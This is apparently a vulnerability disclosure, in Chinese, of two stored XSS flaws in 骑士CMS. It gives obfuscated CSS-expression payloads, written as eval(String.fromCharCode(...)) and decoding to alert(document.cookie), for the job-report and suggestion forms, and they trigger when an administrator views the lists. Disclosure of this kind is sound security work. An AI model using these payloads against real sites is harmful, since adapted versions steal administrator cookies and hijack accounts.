骑士CMS存储型XSS两枚专打管理员

### 简要描述： 骑士CMS存储型XSS两枚专打管理员。 ### 详细说明： 1. 首页>招聘信息>职位详情 在页面里面可以看到“举报” 点击举报，输入： ``` 我要举报这个骗人的职位，这家公司是流氓什么什么什么什么什么" style="a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))" a=" ``` [<img src="https://images.seebug.org/upload/201410/15215314a76650859b1adb1618b8e18c2a32c172.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/15215314a76650859b1adb1618b8e18c2a32c172.png) 后台管理员进入举报列表页面即中招。 [<img src="https://images.seebug.org/upload/201410/152154337b06687acd02856556d5d959dbce6510.png" alt="2.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/152154337b06687acd02856556d5d959dbce6510.png) 2. 每个页面都可以看到“我要建议”的那个图标，点击提交建议： ``` 意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意见反馈意" style="a:expre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))" a="a ``` [<img src="https://images.seebug.org/upload/201410/15215638d24f6938a3b33dc551aa738d3b562e78.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/15215638d24f6938a3b33dc551aa738d3b562e78.png) 后台管理员进入建议列表页面即中招。 [<img src="https://images.seebug.org/upload/201410/152156253da871e3aecae76c9ada9118499b62aa.png" alt="1.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/152156253da871e3aecae76c9ada9118499b62aa.png) ### 漏洞证明： IE8测试结果如下。其他浏览器几乎都被过滤完了。 [<img src="https://images.seebug.org/upload/201410/152154337b06687acd02856556d5d959dbce6510.png" alt="2.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/152154337b06687acd02856556d5d959dbce6510.png) [<img src="https://images.seebug.org/upload/201410/152156253da871e3aecae76c9ada9118499b62aa.png" alt="1.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/152156253da871e3aecae76c9ada9118499b62aa.png)